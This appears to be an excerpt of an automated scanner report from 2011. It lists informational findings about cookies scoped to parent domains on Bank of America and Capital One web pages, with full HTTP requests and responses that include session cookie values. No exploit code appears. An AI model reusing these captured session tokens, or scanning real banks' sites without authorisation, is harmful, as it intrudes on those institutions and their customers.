GET /credit-cards/cardoverview.action HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:02 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: SMIDENTITY=OCd1eUfyEcTBcdzRmikiUYt9Hcisc1Gh1u9btfXo6jk2iYwtjhebVw1nhgFF6KlmpRdXfWP6oAE1ISBtgIxM3LdoctvAzX27T3D45PQOpMJUeowFgmjuCz+RpSn04+9WLMmF4p/3qP0PVzBHFGFRkzwE5OaT/L0iv4fa0f523oTajKE7dlB/qRvRq16VC3uwSY8nOHjQWKuYZVD9y/EOzzuIC2pbtUE0yVubP+/mxg6D0sevE7x0PoB27bkshtOSL/Y89tKz1feb+T0FxZmgtayMUMoPsHrOu12vLkQLE2hAqZxHc87W+lL+ksrLFRBrg4mECaTf+Y2rhBFThgksB7a7YrXy+P+M1KZi7PFBOBkLBEHb3SHeMWenl/tgGDcsiPv5/+zELJAWZV22EzuihOycvz+1s2wi3UZYCS29J/mO6EQk8LZM1BJ2vaI7/Ay00YstlYJeyAGWhaR17eKkiv9oj3iMJJS7V2AOTwlg0pwItcgPIQ2pQAGe75FFiHk7; path=/; domain=.bankofamerica.com; secure
Location: https://www.bankofamerica.com/credit-cards/viewall.action?context_id=all_cards
Content-language: en-US
Set-cookie: JSESSIONID=0000RfDmnLt4u-iNR9enyTATw_C:12qb4kb6q; Path=/
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


10.69. https://www.bankofamerica.com/homepage/overview.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/overview.go

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/overview.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:04:32 GMT
Server: IBM_HTTP_Server
Cache-Control: no-cache
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Via: On-Demand Router/1.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 48227


       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">

...[SNIP]...

10.70. https://www.bankofamerica.com/homepage/stateSelect.go  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /homepage/stateSelect.go

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /homepage/stateSelect.go HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 302 Found
Date: Wed, 02 Feb 2011 22:04:44 GMT
Server: IBM_HTTP_Server
Location: https://www.bankofamerica.com/content/documents/homepage/fail-over-state.htm
Content-Length: 0
Set-Cookie: state=""; Expires=Mon, 01 Aug 2011 22:04:44 GMT; Path=/; Domain=.bankofamerica.com
Set-Cookie: CONTEXT=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: INTL_LANG=en_US; Path=/; Domain=.bankofamerica.com
Set-Cookie: LANG_COOKIE=en_US; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache="set-cookie, set-cookie2"
Via: On-Demand Router/1.0
Connection: close
Content-Type: text/plain
Content-Language: en-US


10.71. https://www.bankofamerica.com/myexpression_banking/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /myexpression_banking/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /myexpression_banking/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:37:19 GMT
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:37:18 GMT
Content-language: en-US
Set-cookie: JSESSIONID=0000qBCC58S04lOiUm6Gm3P4sLQ:12rfueg3b; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description"
...[SNIP]...

10.72. https://www.bankofamerica.com/retirementcenter  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /retirementcenter

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retirementcenter HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; BIGipServerngen-www.80=1011267243.20480.0000; TCID=0007ae71-9ad3-3b5c-9719-884700000028; LANG_COOKIE=en_US; CFTOKEN=1adcf2e%2D000b94b1%2Dd50b%2D1d49%2D818d%2Dffffffff4552; CMAVID=none; INTL_LANG=en_US; NSC_CbolPgBnfsjdb=445b32097852; GEOSERVER=2; cmTPSet=Y; CFID=130174869; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; TLTSID=D98FA69C2F17102F856AA91CC30F81BB; throttle_value=21;

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:37:19 GMT
Content-length: 0
Content-type: text/html
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:37:19 GMT
Location: https://www.bankofamerica.com/retirementcenter/
Connection: close


10.73. https://www.bankofamerica.com/retirementcenter/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.bankofamerica.com
Path:   /retirementcenter/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /retirementcenter/ HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:05:04 GMT
Content-length: 6708
Content-type: text/html;charset=ISO-8859-1
Set-Cookie: TLTSID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com
Set-Cookie: TLTUID=D98FA69C2F17102F856AA91CC30F81BB; Path=/; Domain=.bankofamerica.com; Expires=Wed, 02-02-2021 22:05:04 GMT
Content-language: en-US
Set-cookie: JSESSIONID=00000dst3On8WtECYEVTJX5Czjw:12qb4kb6q; Path=/
Set-cookie: INTL_LANG=en_US
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Connection: close


       <title>Bank of America | Please Select Your State</title>
       <link rel="stylesheet" href="/www/global/mvc_objects/stylesheet/mvc_content_style.css" type="text/css">
       <link rel="stylesheet" href
...[SNIP]...

10.74. http://www.capitalone.com/about/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /about/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /about/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:40 GMT
Server: Apache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: JSESSIONID=1p8qNJWYfWB5ZkwnxDLZnjSHsp1RWFYccXhcpFpZ4PHTpW00Lg88!1025162061; path=/
Set-Cookie: Corporate=6d2bccf6cy4tLsnPTS0KTk3PTc0riTOoCUktLnFOzcmJMzCo8fF38i3NKckMTi0uzszPc84vBSoxrHGGanKtKEgtykzNS06NMzQwgKj3zENTDAA%3D; domain=.capitalone.com; expires=Saturday, 30-Jan-2021 22:12:40 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Vary: User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 55757

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><meta name="description" content="Explore the history and culture of one of America's
...[SNIP]...

10.75. http://www.capitalone.com/autoloans/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:23 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 30558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Auto Loans - Ca
...[SNIP]...

10.76. http://www.capitalone.com/autoloans/auto-loan-calculator.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/auto-loan-calculator.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/auto-loan-calculator.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:26 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:26 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 33970


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>

<head>
<title>Auto Payment and Other Auto Calculators - Capital One</title>

...[SNIP]...

10.77. http://www.capitalone.com/autoloans/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/index.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/index.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:24 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D2%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:25 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:24 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 30558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Auto Loans - Ca
...[SNIP]...

10.78. http://www.capitalone.com/autoloans/lp/auto-loans-pict.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/lp/auto-loans-pict.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/lp/auto-loans-pict.php HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:23 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:23 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:22 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 12533

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Save time and m
...[SNIP]...

10.79. http://www.capitalone.com/autoloans/refinance/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /autoloans/refinance/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /autoloans/refinance/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:27 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D8%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; expires=Fri, 04-Mar-2011 22:12:27 GMT; path=/; domain=.capitalone.com
Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:26 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 24471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Auto Refinance
...[SNIP]...

10.80. http://www.capitalone.com/bank/commercial/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /bank/commercial/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bank/commercial/ HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:12:20 GMT
Server: Apache
Cache-Control: no-cache, no-store, must-revalidate
Set-Cookie: caponesb=c_m%3D3; expires=Thu, 02-Feb-2012 22:12:20 GMT; path=/; domain=.capitalone.com
Vary: Accept-Encoding,User-Agent
P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
Content-Length: 41880

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><HTML><HEAD><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Comme
...[SNIP]...

10.81. http://www.capitalone.com/bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.capitalone.com
Path:   /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /bank/homeloansandmortgages/home-loan-assistance/legacy-ccb/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C8_01_T_HLMAINFOCCB HTTP/1.1
Host: www.capitalone.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
